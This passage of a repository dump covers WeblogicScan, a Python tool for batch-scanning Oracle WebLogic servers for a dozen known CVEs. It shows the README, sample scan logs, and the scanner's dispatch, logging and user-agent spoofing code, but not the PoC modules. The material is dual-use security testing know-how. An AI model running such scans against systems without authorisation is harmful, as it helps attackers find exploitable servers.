├── LICENSE ├── README.md ├── Weblogic.log ├── WeblogicScan.jpg ├── WeblogicScan.py ├── config ├── config_banners.py ├── config_console.py ├── config_logging.py └── config_requests.py ├── poc ├── CVE_2014_4210.py ├── CVE_2016_0638.py ├── CVE_2016_3510.py ├── CVE_2017_10271.py ├── CVE_2017_3248.py ├── CVE_2017_3506.py ├── CVE_2018_2628.py ├── CVE_2018_2893.py ├── CVE_2018_2894.py ├── CVE_2019_2725.py ├── CVE_2019_2729.py ├── CVE_2019_2890.py ├── Console.py ├── Whoareu.py └── index.py ├── requirements.txt └── target.txt /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 RabbitMask 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

2 | 3 | # WeblogicScan 4 | Weblogic一键漏洞检测工具，V1.5 5 | ``` 6 | 软件作者：Tide_RabbitMask 7 | 免责声明：Pia!(ｏ ‵-′)ノ”(ノ﹏<。) 8 | 本工具仅用于安全测试，请勿用于非法使用，要乖哦~ 9 | 10 | V 1.5功能介绍： 11 | 提供一键poc检测，收录几乎全部weblogic历史漏洞。 12 | 详情如下： 13 | 14 | #控制台路径泄露 15 | Console 16 | 17 | #SSRF： 18 | CVE-2014-4210 19 | 20 | #JAVA反序列化 21 | CVE-2016-0638 22 | CVE-2016-3510 23 | CVE-2017-3248 24 | CVE-2018-2628 25 | CVE-2018-2893 26 | CVE-2019-2725 27 | CVE-2019-2729 28 | CVE_2019_2890 29 | 30 | #任意文件上传 31 | CVE-2018-2894 32 | 33 | #XMLDecoder反序列化 34 | CVE-2017-3506 35 | CVE-2017-10271 36 | 37 | V 1.1 更新日志: 38 | 删减全部EXP 39 | 删减POC:CVE-2015-4852 40 | 新增POC:CVE-2017-10271,CVE-2019-2725,CVE-2018-2894 41 | 新增日志功能 42 | 全新交互模式 43 | 全新名称、Banner 44 | 45 | V 1.2 更新日志: 46 | 新增离线依赖安装模式，满足内网测试需求： 47 | 即新增文件夹:/whl/ 48 | Usage：python3 install.py 49 | 50 | V 1.3 更新日志: 51 | 全新支持Python3 52 | 重写POC:CVE-2019-2725 53 | 新增POC:CVE-2019-2729 54 | 55 | V 1.4 更新日志: [20200729] 56 | 新增POC:CVE_2019_2890 57 | 全新框架设计，高度封装与拟人化 58 | 舍弃离线安装模块 59 | 重点修复：从根本上解决脚本异常卡死问题（不同目标版本的异常通信造成） 60 | 重点升级：从根本上解决脚本漏报误报问题（部分原因由py2->py3升级造成） 61 | # Not End： 62 | 话说大家一直好奇其它同类型工具增加的CVE-2020-* 为什么一直没有在这里出现。 63 | 其实相关的漏洞利用链以及最新的EXP我都有自己去复现或自己去写，手头也差不多是全的， 64 | 但是如何把他们去靠谱的自动化集成一直是个问题，很多公开利用链是依赖ldap或没有回显可供正则的。 65 | :) 至于1.4高度封装与框架重新设计的目的，V1.5批量版本近期更新，敬请期待。 66 | 67 | V 1.5 更新日志: [20200730] [快不快？/嚣张脸:)] 68 | 新增模块:Whoareu,基于T3的目标版本精确识别 69 | 重点升级：增加批量扫描功能,智能兼容默认端口或自定义端口 70 | 仅打印检测成功的内容，更多内容详见weblogic.log日志 71 | ``` 72 | Software using Demo: 73 | === 74 | ```python WeblogicScan.py -h``` 75 | ``` 76 | __ __ _ _ _ ____ 77 | \ \ / /__| |__ | | ___ __ _(_) ___ / ___| ___ __ _ _ __ 78 | \ \ /\ / / _ \ '_ \| |/ _ \ / _` | |/ __| \___ \ / __/ _` | '_ \ 79 | \ V V / __/ |_) | | (_) | (_| | | (__ ___) | (_| (_| | | | | 80 | \_/\_/ \___|_.__/|_|\___/ \__, |_|\___| |____/ \___\__,_|_| |_| 81 | |___/ 82 | By Tide_RabbitMask | V 1.5 83 | 84 | Welcome To WeblogicScan !!! 85 | Whoami：https://github.com/rabbitmask 86 | usage: WeblogicScan.py [-h] [-u IP] [-p PORT] [-f FILE] 87 | 88 | optional arguments: 89 | -h, --help show this help message and exit 90 | 91 | Scanner: 92 | -u IP target ip 93 | -p PORT target port 94 | -f FILE target list 95 | ``` 96 | ```python WeblogicScan.py -u 127.0.0.1 -p 7001``` 97 | ``` 98 | __ __ _ _ _ ____ 99 | \ \ / /__| |__ | | ___ __ _(_) ___ / ___| ___ __ _ _ __ 100 | \ \ /\ / / _ \ '_ \| |/ _ \ / _` | |/ __| \___ \ / __/ _` | '_ \ 101 | \ V V / __/ |_) | | (_) | (_| | | (__ ___) | (_| (_| | | | | 102 | \_/\_/ \___|_.__/|_|\___/ \__, |_|\___| |____/ \___\__,_|_| |_| 103 | |___/ 104 | By Tide_RabbitMask | V 1.5 105 | 106 | Welcome To WeblogicScan !!! 107 | Whoami：https://github.com/rabbitmask 108 | [*] =========Task Start========= 109 | [+] [127.0.0.1:7001] Weblogic Version Is 10.3.6.0 110 | [+] [127.0.0.1:7001] Weblogic console address is exposed! The path is: http://127.0.0.1:7001/console/login/LoginForm.jsp 111 | [+] [127.0.0.1:7001] Weblogic UDDI module is exposed! The path is: http://127.0.0.1:7001/uddiexplorer/ 112 | [+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2016-0638 113 | [-] [127.0.0.1:7001] weblogic not detected CVE-2016-3510 114 | [-] [127.0.0.1:7001] weblogic not detected CVE-2017-10271 115 | [-] [127.0.0.1:7001] weblogic not detected CVE-2017-3248 116 | [-] [127.0.0.1:7001] weblogic not detected CVE-2017-3506 117 | [+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2018-2628 118 | [+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2018-2893 119 | [-] [127.0.0.1:7001] weblogic not detected CVE-2018-2894 120 | [-] [127.0.0.1:7001] weblogic not detected CVE-2019-2725 121 | [-] [127.0.0.1:7001] weblogic not detected CVE-2019-2729 122 | [+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2890 123 | [*] ==========Task End========== 124 | ``` 125 | ```python WeblogicScan.py -f target.txt``` 126 | ``` 127 | __ __ _ _ _ ____ 128 | \ \ / /__| |__ | | ___ __ _(_) ___ / ___| ___ __ _ _ __ 129 | \ \ /\ / / _ \ '_ \| |/ _ \ / _` | |/ __| \___ \ / __/ _` | '_ \ 130 | \ V V / __/ |_) | | (_) | (_| | | (__ ___) | (_| (_| | | | | 131 | \_/\_/ \___|_.__/|_|\___/ \__, |_|\___| |____/ \___\__,_|_| |_| 132 | |___/ 133 | By Tide_RabbitMask | V 1.5 134 | 135 | Welcome To WeblogicScan !!! 136 | Whoami：https://github.com/rabbitmask 137 | [*] ========Task Num: [2]======== 138 | [*] =========Task Start========= 139 | [+] [127.0.0.1:7001] Weblogic Version Is 10.3.6.0 140 | [+] [172.19.19.19:7001] Weblogic Version Is 10.3.6.0 141 | [+] [127.0.0.1:7001] Weblogic console address is exposed! The path is: http://127.0.0.1:7001/console/login/LoginForm.jsp 142 | [+] [172.19.19.19:7001] Weblogic console address is exposed! The path is: http://172.19.19.19:7001/console/login/LoginForm.jsp 143 | [+] [127.0.0.1:7001] Weblogic UDDI module is exposed! The path is: http://127.0.0.1:7001/uddiexplorer/ 144 | [+] [172.19.19.19:7001] Weblogic UDDI module is exposed! The path is: http://172.19.19.19:7001/uddiexplorer/ 145 | [+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2016-0638 146 | [+] [172.19.19.19:7001] weblogic has a JAVA deserialization vulnerability:CVE-2016-0638 147 | [+] [172.19.19.19:7001] weblogic has a JAVA deserialization vulnerability:CVE-2018-2628 148 | [+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2018-2628 149 | [+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2018-2893 150 | [+] [172.19.19.19:7001] weblogic has a JAVA deserialization vulnerability:CVE-2018-2893 151 | [+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2890 152 | [+] [172.19.19.19:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2890 153 | [*] ==========Task End========== 154 | ``` 155 | ``` 156 | # Demo target.txt (端口默认为7001) 157 | 158 | 127.0.0.1:7001 159 | 192.168.1.1 160 | 192.168.1.1:80 161 | ``` 162 | ``` 163 | # Demo Weblogic.log 164 | 165 | 2020-07-30 14:15:48,266 [+] [127.0.0.1:7001] Weblogic Version Is 10.3.6.0 166 | 2020-07-30 14:15:48,267 [+] [172.19.19.19:7001] Weblogic Version Is 10.3.6.0 167 | 2020-07-30 14:15:48,276 [+] [127.0.0.1:7001] Weblogic console address is exposed! The path is: http://127.0.0.1:7001/console/login/LoginForm.jsp 168 | 2020-07-30 14:15:48,314 [+] [172.19.19.19:7001] Weblogic console address is exposed! The path is: http://172.19.19.19:7001/console/login/LoginForm.jsp 169 | 2020-07-30 14:15:48,376 [+] [127.0.0.1:7001] Weblogic UDDI module is exposed! The path is: http://127.0.0.1:7001/uddiexplorer/ 170 | 2020-07-30 14:15:48,393 [+] [172.19.19.19:7001] Weblogic UDDI module is exposed! The path is: http://172.19.19.19:7001/uddiexplorer/ 171 | 2020-07-30 14:16:01,584 [+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2016-0638 172 | 2020-07-30 14:16:01,598 [+] [172.19.19.19:7001] weblogic has a JAVA deserialization vulnerability:CVE-2016-0638 173 | 2020-07-30 14:16:14,800 [-] [127.0.0.1:7001] weblogic not detected CVE-2016-3510 174 | 2020-07-30 14:16:14,802 [-] [172.19.19.19:7001] weblogic not detected CVE-2016-3510 175 | 2020-07-30 14:16:14,818 [-] [127.0.0.1:7001] weblogic not detected CVE-2017-10271 176 | 2020-07-30 14:16:14,821 [-] [172.19.19.19:7001] weblogic not detected CVE-2017-10271 177 | 2020-07-30 14:16:28,031 [-] [127.0.0.1:7001] weblogic not detected CVE-2017-3248 178 | 2020-07-30 14:16:28,035 [-] [172.19.19.19:7001] weblogic not detected CVE-2017-3248 179 | 2020-07-30 14:16:28,041 [-] [172.19.19.19:7001] weblogic not detected CVE-2017-3506 180 | 2020-07-30 14:16:28,048 [-] [127.0.0.1:7001] weblogic not detected CVE-2017-3506 181 | 2020-07-30 14:16:51,253 [+] [172.19.19.19:7001] weblogic has a JAVA deserialization vulnerability:CVE-2018-2628 182 | 2020-07-30 14:16:51,261 [+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2018-2628 183 | 2020-07-30 14:17:04,466 [+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2018-2893 184 | 2020-07-30 14:17:04,471 [-] [127.0.0.1:7001] weblogic not detected CVE-2018-2894 185 | 2020-07-30 14:17:04,609 [-] [127.0.0.1:7001] weblogic not detected CVE-2019-2725 186 | 2020-07-30 14:17:06,381 [+] [172.19.19.19:7001] weblogic has a JAVA deserialization vulnerability:CVE-2018-2893 187 | 2020-07-30 14:17:06,385 [-] [172.19.19.19:7001] weblogic not detected CVE-2018-2894 188 | 2020-07-30 14:17:06,553 [-] [172.19.19.19:7001] weblogic not detected CVE-2019-2725 189 | 2020-07-30 14:17:06,649 [-] [127.0.0.1:7001] weblogic not detected CVE-2019-2729 190 | 2020-07-30 14:17:08,591 [-] [172.19.19.19:7001] weblogic not detected CVE-2019-2729 191 | 2020-07-30 14:17:19,854 [+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2890 192 | 2020-07-30 14:17:21,805 [+] [172.19.19.19:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2890 193 | ``` 194 | 195 | ##### Thanks for the support from [JetBrains](https://www.jetbrains.com/?from=WeblogicScan). -------------------------------------------------------------------------------- /Weblogic.log: -------------------------------------------------------------------------------- 1 | 2020-07-30 14:15:48,266 [+] [127.0.0.1:7001] Weblogic Version Is 10.3.6.0 2 | 2020-07-30 14:15:48,267 [+] [172.19.19.19:7001] Weblogic Version Is 10.3.6.0 3 | 2020-07-30 14:15:48,276 [+] [127.0.0.1:7001] Weblogic console address is exposed! The path is: http://127.0.0.1:7001/console/login/LoginForm.jsp 4 | 2020-07-30 14:15:48,314 [+] [172.19.19.19:7001] Weblogic console address is exposed! The path is: http://172.19.19.19:7001/console/login/LoginForm.jsp 5 | 2020-07-30 14:15:48,376 [+] [127.0.0.1:7001] Weblogic UDDI module is exposed! The path is: http://127.0.0.1:7001/uddiexplorer/ 6 | 2020-07-30 14:15:48,393 [+] [172.19.19.19:7001] Weblogic UDDI module is exposed! The path is: http://172.19.19.19:7001/uddiexplorer/ 7 | 2020-07-30 14:16:01,584 [+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2016-0638 8 | 2020-07-30 14:16:01,598 [+] [172.19.19.19:7001] weblogic has a JAVA deserialization vulnerability:CVE-2016-0638 9 | 2020-07-30 14:16:14,800 [-] [127.0.0.1:7001] weblogic not detected CVE-2016-3510 10 | 2020-07-30 14:16:14,802 [-] [172.19.19.19:7001] weblogic not detected CVE-2016-3510 11 | 2020-07-30 14:16:14,818 [-] [127.0.0.1:7001] weblogic not detected CVE-2017-10271 12 | 2020-07-30 14:16:14,821 [-] [172.19.19.19:7001] weblogic not detected CVE-2017-10271 13 | 2020-07-30 14:16:28,031 [-] [127.0.0.1:7001] weblogic not detected CVE-2017-3248 14 | 2020-07-30 14:16:28,035 [-] [172.19.19.19:7001] weblogic not detected CVE-2017-3248 15 | 2020-07-30 14:16:28,041 [-] [172.19.19.19:7001] weblogic not detected CVE-2017-3506 16 | 2020-07-30 14:16:28,048 [-] [127.0.0.1:7001] weblogic not detected CVE-2017-3506 17 | 2020-07-30 14:16:51,253 [+] [172.19.19.19:7001] weblogic has a JAVA deserialization vulnerability:CVE-2018-2628 18 | 2020-07-30 14:16:51,261 [+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2018-2628 19 | 2020-07-30 14:17:04,466 [+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2018-2893 20 | 2020-07-30 14:17:04,471 [-] [127.0.0.1:7001] weblogic not detected CVE-2018-2894 21 | 2020-07-30 14:17:04,609 [-] [127.0.0.1:7001] weblogic not detected CVE-2019-2725 22 | 2020-07-30 14:17:06,381 [+] [172.19.19.19:7001] weblogic has a JAVA deserialization vulnerability:CVE-2018-2893 23 | 2020-07-30 14:17:06,385 [-] [172.19.19.19:7001] weblogic not detected CVE-2018-2894 24 | 2020-07-30 14:17:06,553 [-] [172.19.19.19:7001] weblogic not detected CVE-2019-2725 25 | 2020-07-30 14:17:06,649 [-] [127.0.0.1:7001] weblogic not detected CVE-2019-2729 26 | 2020-07-30 14:17:08,591 [-] [172.19.19.19:7001] weblogic not detected CVE-2019-2729 27 | 2020-07-30 14:17:19,854 [+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2890 28 | 2020-07-30 14:17:21,805 [+] [172.19.19.19:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2890 29 | -------------------------------------------------------------------------------- /WeblogicScan.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rabbitmask/WeblogicScan/05cee3a69cf403e4db5f057c569a923c107cb97b/WeblogicScan.jpg -------------------------------------------------------------------------------- /WeblogicScan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | 4 | ''' 5 | ____ _ _ _ _ __ __ _ 6 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 7 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 8 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 9 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 10 | 11 | ''' 12 | from config.config_banners import banner 13 | from config.config_console import Weblogic_Console 14 | 15 | 16 | def run(): 17 | print(banner) 18 | print('Welcome To WeblogicScan !!!\nWhoami：https://github.com/rabbitmask') 19 | Weblogic_Console() 20 | 21 | if __name__ == '__main__': 22 | run() 23 | -------------------------------------------------------------------------------- /config/config_banners.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | ''' 10 | version = "1.5" 11 | banner=''' 12 | __ __ _ _ _ ____ 13 | \ \ / /__| |__ | | ___ __ _(_) ___ / ___| ___ __ _ _ __ 14 | \ \ /\ / / _ \ '_ \| |/ _ \ / _` | |/ __| \___ \ / __/ _` | '_ \ 15 | \ V V / __/ |_) | | (_) | (_| | | (__ ___) | (_| (_| | | | | 16 | \_/\_/ \___|_.__/|_|\___/ \__, |_|\___| |____/ \___\__,_|_| |_| 17 | |___/ 18 | By Tide_RabbitMask | V {} 19 | '''.format(version) -------------------------------------------------------------------------------- /config/config_console.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | ''' 10 | import argparse 11 | 12 | from config.config_logging import loglog 13 | from multiprocessing import Pool, Manager 14 | from poc.index import * 15 | 16 | def pocbase(pocname,rip,rport): 17 | try: 18 | tmp,res=eval(pocname).run(rip,rport) 19 | return (tmp,res) 20 | except: 21 | pass 22 | 23 | def poc(rip,rport): 24 | print ("[*] =========Task Start=========") 25 | for i in pocindex: 26 | res=pocbase(i,rip,rport) 27 | if res: 28 | loglog(res[1]) 29 | print(res[1]) 30 | print ("[*] =========Task E n d=========") 31 | 32 | def pocs(rip,rport,q): 33 | try: 34 | for i in pocindex: 35 | res=pocbase(i,rip,rport) 36 | if res: 37 | loglog(res[1]) 38 | if res[0]==1: 39 | print(res[1]) 40 | except: 41 | print ("[-] [{}] Weblogic Network Is Abnormal ".format(rip+':'+str(rport))) 42 | q.put(rip,rport) 43 | 44 | 45 | def poolmana(filename): 46 | fr=open(filename,'r') 47 | url=fr.readlines() 48 | fr.close() 49 | print ("[*] ========Task Num: [{}]========".format(len(url))) 50 | print ("[*] =========Task Start=========") 51 | p = Pool(10) 52 | q = Manager().Queue() 53 | for i in url: 54 | i=i.replace('\n','') 55 | if ':' in i: 56 | ip=i.split(':')[0] 57 | port=int(i.split(':')[1]) 58 | p.apply_async(pocs, args=(ip,port,q,)) 59 | else: 60 | ip=i 61 | port=7001 62 | p.apply_async(pocs, args=(ip,port,q,)) 63 | p.close() 64 | p.join() 65 | print ("[*] ==========Task End==========") 66 | 67 | 68 | def Weblogic_Console(): 69 | parser = argparse.ArgumentParser() 70 | scanner = parser.add_argument_group('Scanner') 71 | 72 | scanner.add_argument("-u",dest='ip', help="target ip") 73 | scanner.add_argument("-p", dest='port', help="target port") 74 | scanner.add_argument("-f", dest='file', help="target list") 75 | 76 | args = parser.parse_args() 77 | 78 | if args.ip and args.port: 79 | try: 80 | poc(args.ip,int(args.port)) 81 | except ConnectionRefusedError: 82 | print("[-] [{}] Weblogic Network Is Abnormal ".format(args.ip + ':' + str(args.port))) 83 | print("[*] ==========Task End==========") 84 | elif args.file: 85 | poolmana(args.file) 86 | 87 | -------------------------------------------------------------------------------- /config/config_logging.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | ''' 10 | import logging 11 | 12 | logging.basicConfig(filename='Weblogic.log', 13 | format='%(asctime)s %(message)s', 14 | filemode="a", level=logging.INFO) 15 | 16 | def loglog(log): 17 | logging.info(log) -------------------------------------------------------------------------------- /config/config_requests.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | ''' 10 | 11 | # from fake_useragent import UserAgent 12 | # 13 | # # 实例化 UserAgent 类 14 | # ua = UserAgent(verify_ssl=False) 15 | # 16 | # # 通用headers配置 17 | # headers={"User-Agent":ua.random} 18 | # 19 | # if __name__ == '__main__': 20 | # print(headers) 21 | 22 | import random 23 | 24 | ua=random.choice([ 25 | "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", 26 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", 27 | "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", 28 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", 29 | "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", 30 | "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", 31 | "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", 32 | "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", 33 | "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", 34 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", 35 | "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", 36 | "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", 37 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", 38 | "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", 39 | "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", 40 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", 41 | "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", 42 | "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", 43 | "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", 44 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", 45 | "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", 46 | "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", 47 | "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.517 Safari/537.36", 48 | "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36", 49 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36", 50 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36", 51 | "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36", 52 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1623.0 Safari/537.36", 53 | "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36", 54 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.62 Safari/537.36", 55 | "Mozilla/5.0 (X11; CrOS i686 4319.74.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36", 56 | "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36", 57 | "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36", 58 | "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1467.0 Safari/537.36", 59 | "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36", 60 | "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1500.55 Safari/537.36", 61 | "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36", 62 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36", 63 | "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36", 64 | "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36", 65 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36", 66 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36", 67 | "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36", 68 | "Mozilla/5.0 (X11; NetBSD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36", 69 | "Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36", 70 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17", 71 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1309.0 Safari/537.17", 72 | "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.15 (KHTML, like Gecko) Chrome/24.0.1295.0 Safari/537.15", 73 